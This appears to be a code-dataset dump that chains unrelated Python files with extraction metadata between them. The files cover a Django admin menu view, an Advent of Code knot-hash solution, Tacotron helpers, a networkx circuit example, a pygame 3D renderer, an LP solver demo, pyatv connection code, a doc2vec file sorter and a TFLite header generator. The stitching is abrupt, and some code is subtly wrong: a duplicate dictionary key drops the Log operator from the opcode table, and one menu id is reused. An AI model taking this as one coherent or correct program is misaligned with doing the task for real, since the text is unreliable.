'name': 'workingOverview',
'parentId': 100,
'id': 7,
'meta': {
'title': 'Woring Overview'
},
'component': 'PiWorkingStatus'
},
# // form
{
'name': 'form',
'parentId': -1,
'id': 10,
'meta': {
'icon': 'form',
'title': '表单页'
},
'redirect': '/form/base-form',
'component': 'PageView'
},
{
'name': 'basic-form',
'parentId': 10,
'id': 6,
'meta': {
'title': '基础表单'
},
'component': 'BasicForm'
},
{
'name': 'step-form',
'parentId': 10,
'id': 5,
'meta': {
'title': '分步表单'
},
'component': 'StepForm'
},
{
'name': 'advanced-form',
'parentId': 10,
'id': 4,
'meta': {
'title': '高级表单'
},
'component': 'AdvanceForm'
},
# // list
{
'name': 'list',
'parentId': -1,
'id': 10010,
'meta': {
'icon': 'table',
'title': '列表页',
'show': True
},
'redirect': '/list/table-list',
'component': 'PageView'
},
{
'name': 'table-list',
'parentId': 10010,
'id': 10011,
'path': '/list/table-list/:pageNo([1-9]\\d*)?',
'meta': {
'title': '查询表格',
'show': True
},
'component': 'TableList'
},
{
'name': 'basic-list',
'parentId': 10010,
'id': 10012,
'meta': {
'title': '标准列表',
'show': True
},
'component': 'StandardList'
},
{
'name': 'card',
'parentId': 10010,
'id': 10013,
'meta': {
'title': '卡片列表',
'show': True
},
'component': 'CardList'
},
{
'name': 'search',
'parentId': 10010,
'id': 10014,
'meta': {
'title': '搜索列表',
'show': True
},
'redirect': '/list/search/article',
'component': 'SearchLayout'
},
{
'name': 'article',
'parentId': 10014,
'id': 10015,
'meta': {
'title': '搜索列表(文章)',
'show': True
},
'component': 'SearchArticles'
},
{
'name': 'project',
'parentId': 10014,
'id': 10016,
'meta': {
'title': '搜索列表(项目)',
'show': True
},
'component': 'SearchProjects'
},
{
'name': 'application',
'parentId': 10014,
'id': 10017,
'meta': {
'title': '搜索列表(应用)',
'show': True
},
'component': 'SearchApplications'
},
# // profile
{
'name': 'profile',
'parentId': -1,
'id': 10018,
'meta': {
'title': '详情页',
'icon': 'profile',
'show': True
},
'redirect': '/profile/basic',
'component': 'RouteView'
},
{
'name': 'basic',
'parentId': 10018,
'id': 10019,
'meta': {
'title': '基础详情页',
'show': True
},
'component': 'ProfileBasic'
},
{
'name': 'advanced',
'parentId': 10018,
'id': 10020,
'meta': {
'title': '高级详情页',
'show': True
},
'component': 'ProfileAdvanced'
},
# // result
{
'name': 'result',
'parentId': -1,
'id': 10021,
'meta': {
'title': '结果页',
'icon': 'check-circle-o',
'show': True
},
'redirect': '/result/success',
'component': 'PageView'
},
{
'name': 'success',
'parentId': 10021,
'id': 10022,
'meta': {
'title': '成功',
'hiddenHeaderContent': True,
'show': True
},
'component': 'ResultSuccess'
},
{
'name': 'fail',
'parentId': 10021,
'id': 10023,
'meta': {
'title': '失败',
'hiddenHeaderContent': True,
'show': True
},
'component': 'ResultFail'
},
# // Exception
{
'name': 'exception',
'parentId': -1,
'id': 10024,
'meta': {
'title': '异常页',
'icon': 'warning',
'show': True
},
'redirect': '/exception/403',
'component': 'RouteView'
},
{
'name': '403',
'parentId': 10024,
'id': 10025,
'meta': {
'title': '403',
'show': True
},
'component': 'Exception403'
},
{
'name': '404',
'parentId': 10024,
'id': 10026,
'meta': {
'title': '404',
'show': True
},
'component': 'Exception404'
},
{
'name': '500',
'parentId': 10024,
'id': 10027,
'meta': {
'title': '500',
'show': True
},
'component': 'Exception500'
},
# // account
{
'name': 'account',
'parentId': -1,
'id': 10028,
'meta': {
'title': '个人页',
'icon': 'user',
'show': True
},
'redirect': '/account/center',
'component': 'RouteView'
},
{
'name': 'center',
'parentId': 10028,
'id': 10029,
'meta': {
'title': '个人中心',
'show': True
},
'component': 'AccountCenter'
},
# // 特殊三级菜单
{
'name': 'settings',
'parentId': 10028,
'id': 10030,
'meta': {
'title': '个人设置',
'hideHeader': True,
'hideChildren': True,
'show': True
},
'redirect': '/account/settings/base',
'component': 'AccountSettings'
},
{
'name': 'BaseSettings',
'path': '/account/settings/base',
'parentId': 10030,
'id': 10031,
'meta': {
'title': '基本设置',
'show': False
},
'component': 'BaseSettings'
},
{
'name': 'SecuritySettings',
'path': '/account/settings/security',
'parentId': 10030,
'id': 10032,
'meta': {
'title': '安全设置',
'show': False
},
'component': 'SecuritySettings'
},
{
'name': 'CustomSettings',
'path': '/account/settings/custom',
'parentId': 10030,
'id': 10033,
'meta': {
'title': '个性化设置',
'show': False
},
'component': 'CustomSettings'
},
{
'name': 'BindingSettings',
'path': '/account/settings/binding',
'parentId': 10030,
'id': 10034,
'meta': {
'title': '账户绑定',
'show': False
},
'component': 'BindingSettings'
},
{
'name': 'NotificationSettings',
'path': '/account/settings/notification',
'parentId': 10030,
'id': 10034,
'meta': {
'title': '新消息通知',
'show': False
},
'component': 'NotificationSettings'
}
]
navResult = {
'result': nav
}
return HttpResponse(json.dumps(navResult, indent=4))
| [
"json.dumps"
] | [((13030, 13060), 'json.dumps', 'json.dumps', (['userInfo'], {'indent': '(4)'}), '(userInfo, indent=4)\n', (13040, 13060), False, 'import json\n'), ((21313, 21344), 'json.dumps', 'json.dumps', (['navResult'], {'indent': '(4)'}), '(navResult, indent=4)\n', (21323, 21344), False, 'import json\n')] |
#%%
# read full assignment
# think algo before implementing
# dont use a dict when you need a list
# assignment is still = and not ==
# dont use itertools when you can use np.roll
# check mathemathical functions if the parentheses are ok
# networkx is awesome
# sometimes while true is better than just too small for loop
# networkx addes nodes when adding edge to nonexistent node
# %%
import os
import re
import numpy as np
try:
os.chdir(os.path.join(os.getcwd(), 'day 14'))
print(os.getcwd())
except:
pass
from functools import reduce
import operator
import networkx as nx
import numpy as np
# f = open('input.txt','r').read().strip()
def gethash(f):
lengths = [ord(l) for l in f]
lengths += [17, 31, 73, 47, 23]
circular = np.arange(256)
skip = 0
start = 0
for r in range(64):
for l in lengths:
circular = np.roll(circular,-start)
circular[:l]=circular[:l][::-1]
circular = np.roll(circular,+start)
start = (start + l + skip)%len(circular)
skip +=1
def densehash(inp):
return (reduce(lambda a,b : operator.xor(a,b),inp))
hashcode = ''
for i in range(16):
hashcode += hex(densehash(circular[i*16:i*16+16]))[2:].zfill(2)
return hashcode
def getbits(inp):
my_hexdata = inp
scale = 16 ## equals to hexadecimal
num_of_bits = 4
return bin(int(my_hexdata, scale))[2:].zfill(num_of_bits)
count= 0
f = 'stpzcrnm'
for r in range(128):
h = gethash('stpzcrnm-'+str(r))
count+=len(''.join([getbits(b) for b in h]).replace('0',''))
count
# %%
count= 0
grid = []
f = 'stpzcrnm'
for r in range(128):
h = gethash('stpzcrnm-'+str(r))
grid.append(list(''.join([getbits(b) for b in h])))
count+=len(''.join([getbits(b) for b in h]).replace('0',''))
# %%
grid = np.array(grid)
print(grid.shape)
G = nx.Graph()
for index,output in np.ndenumerate(grid):
if output == '1':
i,j = index[0], index[1]
G.add_edge((i,j),(i+1,j))
G.add_edge((i,j),(i-1,j))
G.add_edge((i,j),(i,j+1))
G.add_edge((i,j),(i,j-1))
for index,output in np.ndenumerate(grid):
if output == '0':
if G.has_node(index): G.remove_node(index)
nx.number_connected_components(G)
# %%
| [
"numpy.roll",
"networkx.Graph",
"numpy.ndenumerate",
"os.getcwd",
"numpy.array",
"networkx.number_connected_components",
"operator.xor",
"numpy.arange"
] | [((1816, 1830), 'numpy.array', 'np.array', (['grid'], {}), '(grid)\n', (1824, 1830), True, 'import numpy as np\n'), ((1853, 1863), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (1861, 1863), True, 'import networkx as nx\n'), ((1885, 1905), 'numpy.ndenumerate', 'np.ndenumerate', (['grid'], {}), '(grid)\n', (1899, 1905), True, 'import numpy as np\n'), ((2119, 2139), 'numpy.ndenumerate', 'np.ndenumerate', (['grid'], {}), '(grid)\n', (2133, 2139), True, 'import numpy as np\n'), ((2215, 2248), 'networkx.number_connected_components', 'nx.number_connected_components', (['G'], {}), '(G)\n', (2245, 2248), True, 'import networkx as nx\n'), ((746, 760), 'numpy.arange', 'np.arange', (['(256)'], {}), '(256)\n', (755, 760), True, 'import numpy as np\n'), ((486, 497), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (495, 497), False, 'import os\n'), ((455, 466), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (464, 466), False, 'import os\n'), ((861, 886), 'numpy.roll', 'np.roll', (['circular', '(-start)'], {}), '(circular, -start)\n', (868, 886), True, 'import numpy as np\n'), ((953, 978), 'numpy.roll', 'np.roll', (['circular', '(+start)'], {}), '(circular, +start)\n', (960, 978), True, 'import numpy as np\n'), ((1112, 1130), 'operator.xor', 'operator.xor', (['a', 'b'], {}), '(a, b)\n', (1124, 1130), False, 'import operator\n')] |
import numpy as np
from scipy.io.wavfile import read
import torch
def get_mask_from_lengths(lengths):
max_len = torch.max(lengths).item()
if torch.cuda.is_available():
ids = torch.arange(0, max_len, out=torch.cuda.LongTensor(max_len))
else:
ids = torch.arange(0, max_len, out=torch.LongTensor(max_len))
mask = (ids < lengths.unsqueeze(1)).byte()
return mask
def load_wav_to_torch(full_path):
sampling_rate, data = read(full_path)
return torch.FloatTensor(data.astype(np.float32)), sampling_rate
def load_dataset(filename, separator="|"):
with open(filename, encoding='utf-8') as f:
dataset = [line.strip().split(separator) for line in f]
return dataset
def to_gpu(x):
x = x.contiguous()
if torch.cuda.is_available():
x = x.cuda(non_blocking=True)
return torch.autograd.Variable(x)
| [
"torch.cuda.LongTensor",
"torch.LongTensor",
"torch.max",
"torch.cuda.is_available",
"scipy.io.wavfile.read",
"torch.autograd.Variable"
] | [((151, 176), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (174, 176), False, 'import torch\n'), ((458, 473), 'scipy.io.wavfile.read', 'read', (['full_path'], {}), '(full_path)\n', (462, 473), False, 'from scipy.io.wavfile import read\n'), ((767, 792), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (790, 792), False, 'import torch\n'), ((843, 869), 'torch.autograd.Variable', 'torch.autograd.Variable', (['x'], {}), '(x)\n', (866, 869), False, 'import torch\n'), ((118, 136), 'torch.max', 'torch.max', (['lengths'], {}), '(lengths)\n', (127, 136), False, 'import torch\n'), ((221, 251), 'torch.cuda.LongTensor', 'torch.cuda.LongTensor', (['max_len'], {}), '(max_len)\n', (242, 251), False, 'import torch\n'), ((306, 331), 'torch.LongTensor', 'torch.LongTensor', (['max_len'], {}), '(max_len)\n', (322, 331), False, 'import torch\n')] |
#!/usr/bin/env python
# circuits.py - convert a Boolean circuit to an equivalent Boolean formula
#
# Copyright 2016 <NAME> <<EMAIL>>.
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
"""
========
Circuits
========
Convert a Boolean circuit to an equivalent Boolean formula.
A Boolean circuit can be exponentially more expressive than an
equivalent formula in the worst case, since the circuit can reuse
subcircuits multiple times, whereas a formula cannot reuse subformulas
more than once. Thus creating a Boolean formula from a Boolean circuit
in this way may be infeasible if the circuit is large.
"""
from networkx import dag_to_branching
from networkx import DiGraph
from networkx.utils import arbitrary_element
def circuit_to_formula(circuit):
# Convert the circuit to an equivalent formula.
formula = dag_to_branching(circuit)
# Transfer the operator or variable labels for each node from the
# circuit to the formula.
for v in formula:
source = formula.node[v]['source']
formula.node[v]['label'] = circuit.node[source]['label']
return formula
def formula_to_string(formula):
def _to_string(formula, root):
# If there are no children, this is a variable node.
label = formula.node[root]['label']
if not formula[root]:
return label
# Otherwise, this is an operator.
children = formula[root]
# If one child, the label must be a NOT operator.
if len(children) == 1:
child = arbitrary_element(children)
return '{}({})'.format(label, _to_string(formula, child))
# NB "left" and "right" here are a little misleading: there is
# no order on the children of a node. That's okay because the
# Boolean AND and OR operators are symmetric. It just means that
# the order of the operands cannot be predicted and hence the
# function does not necessarily behave the same way on every
# invocation.
left, right = formula[root]
left_subformula = _to_string(formula, left)
right_subformula = _to_string(formula, right)
return '({} {} {})'.format(left_subformula, label, right_subformula)
root = next(v for v, d in formula.in_degree() if d == 0)
return _to_string(formula, root)
def main():
# Create an example Boolean circuit.
#
# This circuit has a ∧ at the output and two ∨s at the next layer.
# The third layer has a variable x that appears in the left ∨, a
# variable y that appears in both the left and right ∨s, and a
# negation for the variable z that appears as the sole node in the
# fourth layer.
circuit = DiGraph()
# Layer 0
circuit.add_node(0, label='∧')
# Layer 1
circuit.add_node(1, label='∨')
circuit.add_node(2, label='∨')
circuit.add_edge(0, 1)
circuit.add_edge(0, 2)
# Layer 2
circuit.add_node(3, label='x')
circuit.add_node(4, label='y')
circuit.add_node(5, label='¬')
circuit.add_edge(1, 3)
circuit.add_edge(1, 4)
circuit.add_edge(2, 4)
circuit.add_edge(2, 5)
# Layer 3
circuit.add_node(6, label='z')
circuit.add_edge(5, 6)
# Convert the circuit to an equivalent formula.
formula = circuit_to_formula(circuit)
print(formula_to_string(formula))
if __name__ == '__main__':
main()
| [
"networkx.utils.arbitrary_element",
"networkx.DiGraph",
"networkx.dag_to_branching"
] | [((895, 920), 'networkx.dag_to_branching', 'dag_to_branching', (['circuit'], {}), '(circuit)\n', (911, 920), False, 'from networkx import dag_to_branching\n'), ((2748, 2757), 'networkx.DiGraph', 'DiGraph', ([], {}), '()\n', (2755, 2757), False, 'from networkx import DiGraph\n'), ((1584, 1611), 'networkx.utils.arbitrary_element', 'arbitrary_element', (['children'], {}), '(children)\n', (1601, 1611), False, 'from networkx.utils import arbitrary_element\n')] |
import pygame
import numpy as np
from math import *
import json
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RAINBOW = (0, 0, 0)
rainbow = True
WIDTH, HEIGHT = 800, 600
#WIDTH, HEIGHT = 1600, 900
def drawLine(point1, point2, screen):
if rainbow:
pygame.draw.line(screen, RAINBOW, (point1[0], point1[1]), (point2[0], point2[1]))
else:
pygame.draw.line(screen, BLACK, (point1[0], point1[1]), (point2[0], point2[1]))
def rotateX(angle):
return np.matrix([
[1, 0, 0],
[0, cos(angle), -sin(angle)],
[0, sin(angle), cos(angle)]
])
def rotateY(angle):
return np.matrix([
[cos(angle), 0, sin(angle)],
[0, 1, 0],
[-sin(angle), 0, cos(angle)]
])
def rotateZ(angle):
return np.matrix([
[cos(angle), -sin(angle), 0],
[sin(angle), cos(angle), 0],
[0, 0, 1]
])
def projectPoint(point, angle, offset, scale):
rotated = point.reshape(3, 1)
rotated = np.dot(rotateX(pi / 2), rotated)
rotated = np.dot(rotateX(angle[0]), rotated)
rotated = np.dot(rotateY(angle[1]), rotated)
rotated = np.dot(rotateZ(angle[2]), rotated)
projected = np.dot(np.matrix([[1, 0, 0], [0, 1, 0]]), rotated)
x = int(projected[0][0] * scale) + WIDTH/2
y = int(projected[1][0] * scale) + HEIGHT/2
return [x, y]
def renderObject(objectPath, offset, angle, scale, screen):
f = open(objectPath)
data = json.load(f)
points = data.get("points")
if points:
temp = ""
for pointName in points:
point = points.get(pointName)
point = np.matrix(point)+np.matrix([offset])
temp += '"'+pointName+'":'+str(projectPoint(point, angle, offset, scale))+','
projectedPoints = json.loads('{'+temp[:-1]+'}')
lines = data.get("lines")
if lines:
for line in lines:
for p1name in line:
p1 = p1name
p2 = projectedPoints.get(line.get(p1))
p1 = projectedPoints.get(p1)
drawLine(p1, p2, screen)
objects = data.get("objects")
if objects:
for obj in objects:
renderObject(obj.get("objectPath"), np.squeeze(np.array(np.matrix(obj.get("offset"))+np.matrix(offset)*scale/obj.get("scale"))) ,np.squeeze(np.array(np.matrix(obj["angle"])+ angle)), obj.get("scale"), screen)
screen = pygame.display.set_mode((WIDTH, HEIGHT))
clock = pygame.time.Clock()
angle = 0
while True:
# so spin rate is not super fast/constant
clock.tick(60)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit()
angle += 0.01
screen.fill(WHITE)
# type ur code here
renderObject("objects/2squares.json", [0, 0, 0], [angle, angle, angle], 100, screen)
renderObject("objects/square.json", [0, 0, 1], [angle, angle, angle], 100, screen)
pygame.display.update()
| [
"json.loads",
"pygame.quit",
"pygame.draw.line",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.time.Clock",
"json.load",
"pygame.display.update",
"numpy.matrix"
] | [((2393, 2433), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(WIDTH, HEIGHT)'], {}), '((WIDTH, HEIGHT))\n', (2416, 2433), False, 'import pygame\n'), ((2442, 2461), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (2459, 2461), False, 'import pygame\n'), ((1431, 1443), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1440, 1443), False, 'import json\n'), ((2566, 2584), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (2582, 2584), False, 'import pygame\n'), ((2920, 2943), 'pygame.display.update', 'pygame.display.update', ([], {}), '()\n', (2941, 2943), False, 'import pygame\n'), ((259, 344), 'pygame.draw.line', 'pygame.draw.line', (['screen', 'RAINBOW', '(point1[0], point1[1])', '(point2[0], point2[1])'], {}), '(screen, RAINBOW, (point1[0], point1[1]), (point2[0],\n point2[1]))\n', (275, 344), False, 'import pygame\n'), ((359, 438), 'pygame.draw.line', 'pygame.draw.line', (['screen', 'BLACK', '(point1[0], point1[1])', '(point2[0], point2[1])'], {}), '(screen, BLACK, (point1[0], point1[1]), (point2[0], point2[1]))\n', (375, 438), False, 'import pygame\n'), ((1175, 1208), 'numpy.matrix', 'np.matrix', (['[[1, 0, 0], [0, 1, 0]]'], {}), '([[1, 0, 0], [0, 1, 0]])\n', (1184, 1208), True, 'import numpy as np\n'), ((1757, 1790), 'json.loads', 'json.loads', (["('{' + temp[:-1] + '}')"], {}), "('{' + temp[:-1] + '}')\n", (1767, 1790), False, 'import json\n'), ((2636, 2649), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (2647, 2649), False, 'import pygame\n'), ((1604, 1620), 'numpy.matrix', 'np.matrix', (['point'], {}), '(point)\n', (1613, 1620), True, 'import numpy as np\n'), ((1621, 1640), 'numpy.matrix', 'np.matrix', (['[offset]'], {}), '([offset])\n', (1630, 1640), True, 'import numpy as np\n'), ((2322, 2345), 'numpy.matrix', 'np.matrix', (["obj['angle']"], {}), "(obj['angle'])\n", (2331, 2345), True, 'import numpy as np\n'), ((2258, 2275), 'numpy.matrix', 'np.matrix', (['offset'], {}), '(offset)\n', (2267, 2275), True, 'import numpy as np\n')] |
from xrsolver import Problem
import solver
# This example is the second case from https://www.youtube.com/watch?v=WJEZh7GWHnw
s = solver.Solver()
p = Problem()
x1 = p.generateVariable("x1", lb=0, ub=3)
x2 = p.generateVariable("x2", lb=0, ub=3)
x3 = p.generateVariable("x3", lb=0, ub=3)
x4 = p.generateVariable("x4", lb=0, ub=3)
x5 = p.generateVariable("x5", lb=0, ub=3)
p.addVariable(x1)
p.addVariable(x2)
p.addVariable(x3)
p.addVariable(x4)
p.addVariable(x5)
p.appendConstraint(x1 + x2 <= 5)
p.appendConstraint(x2 <= 0.5 * (x1 + x2))
p.appendConstraint(x5 >= 0.4 * (x3 + x4))
p.appendConstraint(x1 + x2 + x3 + x4 +x5 == 10)
p.appendObjective(8.1 * x1 + 10.5 * x2 + 6.4 * x3 + 7.5 * x4 + 5.0 * x5)
s.solveProblem(p)
print("x1 =", x1.getValue())
print("x2 =", x2.getValue())
print("x3 =", x3.getValue())
print("x4 =", x4.getValue())
print("x5 =", x5.getValue())
| [
"xrsolver.Problem",
"solver.Solver"
] | [((133, 148), 'solver.Solver', 'solver.Solver', ([], {}), '()\n', (146, 148), False, 'import solver\n'), ((154, 163), 'xrsolver.Problem', 'Problem', ([], {}), '()\n', (161, 163), False, 'from xrsolver import Problem\n')] |
"""Main routines for interacting with an Apple TV."""
import asyncio
import datetime # noqa
from ipaddress import IPv4Address
from typing import List
import aiohttp
from pyatv import conf, exceptions, interface
from pyatv.airplay import AirPlayStreamAPI
from pyatv.const import Protocol
from pyatv.dmap import DmapAppleTV
from pyatv.dmap.pairing import DmapPairingHandler
from pyatv.mrp import MrpAppleTV
from pyatv.mrp.pairing import MrpPairingHandler
from pyatv.airplay.pairing import AirPlayPairingHandler
from pyatv.support import net
from pyatv.support.scan import BaseScanner, UnicastMdnsScanner, MulticastMdnsScanner
async def scan(
loop: asyncio.AbstractEventLoop,
timeout: int = 5,
identifier: str = None,
protocol: Protocol = None,
hosts: List[str] = None,
) -> List[conf.AppleTV]:
"""Scan for Apple TVs on network and return their configurations."""
def _should_include(atv):
if not atv.ready:
return False
if identifier and identifier not in atv.all_identifiers:
return False
if protocol and atv.get_service(protocol) is None:
return False
return True
scanner: BaseScanner
if hosts:
scanner = UnicastMdnsScanner([IPv4Address(host) for host in hosts], loop)
else:
scanner = MulticastMdnsScanner(loop, identifier)
devices = (await scanner.discover(timeout)).values()
return [device for device in devices if _should_include(device)]
async def connect(
config: conf.AppleTV,
loop: asyncio.AbstractEventLoop,
protocol: Protocol = None,
session: aiohttp.ClientSession = None,
) -> interface.AppleTV:
"""Connect to a device based on a configuration."""
if config.identifier is None:
raise exceptions.DeviceIdMissingError("no device identifier")
service = config.main_service(protocol=protocol)
implementation = {Protocol.DMAP: DmapAppleTV, Protocol.MRP: MrpAppleTV}.get(
service.protocol
)
if not implementation:
raise exceptions.UnsupportedProtocolError(str(service.protocol))
# AirPlay stream API is the same for both DMAP and MRP
airplay = AirPlayStreamAPI(config, loop)
atv = implementation(loop, await net.create_session(session), config, airplay)
await atv.connect()
return atv
async def pair(
config: conf.AppleTV,
protocol: Protocol,
loop: asyncio.AbstractEventLoop,
session: aiohttp.ClientSession = None,
**kwargs
):
"""Pair a protocol for an Apple TV."""
service = config.get_service(protocol)
if not service:
raise exceptions.NoServiceError(
"no service available for protocol " + str(protocol)
)
handler = {
Protocol.DMAP: DmapPairingHandler,
Protocol.MRP: MrpPairingHandler,
Protocol.AirPlay: AirPlayPairingHandler,
}.get(protocol)
if handler is None:
raise exceptions.UnsupportedProtocolError(str(protocol))
return handler(config, await net.create_session(session), loop, **kwargs)
| [
"pyatv.support.scan.MulticastMdnsScanner",
"pyatv.support.net.create_session",
"ipaddress.IPv4Address",
"pyatv.airplay.AirPlayStreamAPI",
"pyatv.exceptions.DeviceIdMissingError"
] | [((2170, 2200), 'pyatv.airplay.AirPlayStreamAPI', 'AirPlayStreamAPI', (['config', 'loop'], {}), '(config, loop)\n', (2186, 2200), False, 'from pyatv.airplay import AirPlayStreamAPI\n'), ((1320, 1358), 'pyatv.support.scan.MulticastMdnsScanner', 'MulticastMdnsScanner', (['loop', 'identifier'], {}), '(loop, identifier)\n', (1340, 1358), False, 'from pyatv.support.scan import BaseScanner, UnicastMdnsScanner, MulticastMdnsScanner\n'), ((1772, 1827), 'pyatv.exceptions.DeviceIdMissingError', 'exceptions.DeviceIdMissingError', (['"""no device identifier"""'], {}), "('no device identifier')\n", (1803, 1827), False, 'from pyatv import conf, exceptions, interface\n'), ((2239, 2266), 'pyatv.support.net.create_session', 'net.create_session', (['session'], {}), '(session)\n', (2257, 2266), False, 'from pyatv.support import net\n'), ((3004, 3031), 'pyatv.support.net.create_session', 'net.create_session', (['session'], {}), '(session)\n', (3022, 3031), False, 'from pyatv.support import net\n'), ((1248, 1265), 'ipaddress.IPv4Address', 'IPv4Address', (['host'], {}), '(host)\n', (1259, 1265), False, 'from ipaddress import IPv4Address\n')] |
import glob
import os
from doc2vec import read_file, embed_document
def get_file_embeddings():
# Returns a list of names in list files.
txt_files = glob.glob('**/*.txt', recursive=True)
pdf_files = glob.glob('**/*.pdf', recursive=True)
docx_files = glob.glob('**/*.docx', recursive=True)
file_names = txt_files + pdf_files + docx_files
print("Retrieved files:")
for filename in file_names:
print(filename)
vector_list = []
for file in file_names:
v = embed_document(read_file(file))
vector_list.append(v)
print("Processing files...")
return file_names, vector_list
def write_folders(named_folders):
for folder_name, folder in named_folders.items():
if not len(folder): continue
directory = folder_name
for file in folder:
new_path = os.path.join(os.path.dirname(os.path.abspath(file)),
directory)
if not os.path.exists(new_path):
os.mkdir(new_path)
# print(os.path.join(new_path, os.path.basename(os.path.abspath(file))))
os.rename(file, os.path.join(new_path,
os.path.basename(os.path.abspath(file))))
print(f"Moved {len(folder)} files to folder named {folder_name}.")
| [
"os.path.exists",
"os.mkdir",
"os.path.abspath",
"doc2vec.read_file",
"glob.glob"
] | [((158, 195), 'glob.glob', 'glob.glob', (['"""**/*.txt"""'], {'recursive': '(True)'}), "('**/*.txt', recursive=True)\n", (167, 195), False, 'import glob\n'), ((212, 249), 'glob.glob', 'glob.glob', (['"""**/*.pdf"""'], {'recursive': '(True)'}), "('**/*.pdf', recursive=True)\n", (221, 249), False, 'import glob\n'), ((267, 305), 'glob.glob', 'glob.glob', (['"""**/*.docx"""'], {'recursive': '(True)'}), "('**/*.docx', recursive=True)\n", (276, 305), False, 'import glob\n'), ((523, 538), 'doc2vec.read_file', 'read_file', (['file'], {}), '(file)\n', (532, 538), False, 'from doc2vec import read_file, embed_document\n'), ((968, 992), 'os.path.exists', 'os.path.exists', (['new_path'], {}), '(new_path)\n', (982, 992), False, 'import os\n'), ((1010, 1028), 'os.mkdir', 'os.mkdir', (['new_path'], {}), '(new_path)\n', (1018, 1028), False, 'import os\n'), ((878, 899), 'os.path.abspath', 'os.path.abspath', (['file'], {}), '(file)\n', (893, 899), False, 'import os\n'), ((1223, 1244), 'os.path.abspath', 'os.path.abspath', (['file'], {}), '(file)\n', (1238, 1244), False, 'import os\n')] |
#!/usr/bin/env python3
import sys
import os
import argparse
from string import Template
import re
# Patch site-packages to find numpy
import jinja2
if sys.platform.startswith("win"):
site_packages_path = os.path.abspath(os.path.join(os.path.dirname(jinja2.__file__), "../../../ext-site-packages"))
else:
site_packages_path = os.path.abspath(os.path.join(os.path.dirname(jinja2.__file__), "../../../../ext-site-packages"))
if os.path.exists(site_packages_path):
if site_packages_path not in sys.path:
sys.path.insert(0, site_packages_path)
"""
Generation of parameter files requires the tflite_model, tflite_model_parameters
and tensorflow_lite_support packages. Because these packages are not installed
in the uc-generation environment where this python script will be run, these
packages are supplied as source. tflite_model and tflite_model_parameters were
fetched from internal repos, while the tensorflow_lite_support was fetched from
https://github.com/tensorflow/tflite-support.
"""
import tflite.Model
from tflite_model import TfliteModel
from tflite_model_parameters import TfliteModelParameters
template_model_h = """// Auto-generated serialization of TFLite flatbuffers in config directory
#ifndef SL_TFLITE_MICRO_MODEL_H
#define SL_TFLITE_MICRO_MODEL_H
#ifdef __cplusplus
extern "C" {
#endif
#include <stdint.h>
${data}
extern const uint8_t *default_model_array;
extern const uint32_t default_model_len;
#ifdef __cplusplus
}
#endif
#endif // SL_TFLITE_MICRO_MODEL_H
"""
template_model_h_single ="""
extern const uint8_t ${model_name}_array[];
extern const uint32_t ${model_name}_len;
"""
template_model_c = """// Auto-generated serialization of TFLite flatbuffers in config directory
#include "em_device.h"
#include "sl_tflite_micro_model.h"
${data}
const uint8_t *default_model_array = ${model_name}_array;
const uint32_t default_model_len = ${data_len}UL;
"""
template_model_c_single = """
const uint8_t ${model_name}_array[] __ALIGNED(4) = {
${data}
};
const uint32_t ${model_name}_len = ${data_len}UL;
"""
template_opcode_resolver_h = """// Auto-generated macro to instanciate and initialize opcode resolver based on TFLite flatbuffers in config directory
#ifndef SL_TFLITE_MICRO_OPCODE_RESOLVER_H
#define SL_TFLITE_MICRO_OPCODE_RESOLVER_H
#define SL_TFLITE_MICRO_OPCODE_RESOLVER(opcode_resolver, error_reporter) \\
static tflite::MicroMutableOpResolver<${data_len}> opcode_resolver(error_reporter); \\
${data}
#endif // SL_TFLITE_MICRO_OPCODE_RESOLVER_H
"""
template_model_parameter_single = """#define SL_${model_name}_${config_key} ${config_val}
"""
template_model_default_parameter_single = """#define SL_DEFAULT_MODEL_${config_key} SL_${model_name}_${config_key}
"""
template_model_parameters_h = """// Auto-generated parameters from TFLite flatbuffers in config directory
#ifndef SL_TFLITE_MICRO_MODEL_PARAMETERS_H
#define SL_TFLITE_MICRO_MODEL_PARAMETERS_H
${data}
#endif // SL_TFLITE_MICRO_MODEL_PARAMETERS_H
"""
"""
The following dictionary has been created using the BuiltinOperator enum defining operatior values, see schema_generated.h, and
function names defined in the MicroMutableOpResolver object, see micro_mutable_op_resolver.h.
"""
opcode_dict = {
101: 'AddAbs',
0: 'AddAdd',
106: 'AddAddN',
56: 'AddArgMax',
79: 'AddArgMin',
1: 'AddAveragePool2D',
104: 'AddCeil',
2: 'AddConcatenation',
3: 'AddConv2D',
108: 'AddCos',
4: 'AddDepthwiseConv2D',
6: 'AddDequantize',
71: 'AddEqual',
8: 'AddFloor',
9: 'AddFullyConnected',
61: 'AddGreater',
62: 'AddGreaterEqual',
117: 'AddHardSwish',
11: 'AddL2Normalization',
58: 'AddLess',
63: 'AddLessEqual',
73: 'AddLog',
86: 'AddLogicalAnd',
87: 'AddLogicalNot',
84: 'AddLogicalOr',
14: 'AddLogistic',
55: 'AddMaximum',
17: 'AddMaxPool2D',
40: 'AddMean',
57: 'AddMinimum',
18: 'AddMul',
59: 'AddNeg',
73: 'AddNotEqual',
83: 'AddPack',
34: 'AddPad',
60: 'AddPadV2',
54: 'AddPrelu',
114: 'AddQuantize',
82: 'AddReduceMax',
19: 'AddRelu',
21: 'AddRelu6',
22: 'AddReshape',
97: 'AddResizeNearestNeighbor',
116: 'AddRound',
76: 'AddRsqrt',
77: 'AddShape',
66: 'AddSin',
25: 'AddSoftmax',
47: 'AddSplit',
102: 'AddSplitV',
75: 'AddSqrt',
92: 'AddSquare',
45: 'AddStridedSlice',
41: 'AddSub',
27: 'AddSvdf',
28: 'AddTanh',
67: 'AddTransposeConv',
88: 'AddUnpack'
}
def sanitize_filename(name):
# Strip invalid characters
name = re.sub(r'[^a-zA-Z0-9_]', '', name)
# C variables can't start with a number
name = name.lstrip('0123456789')
return name
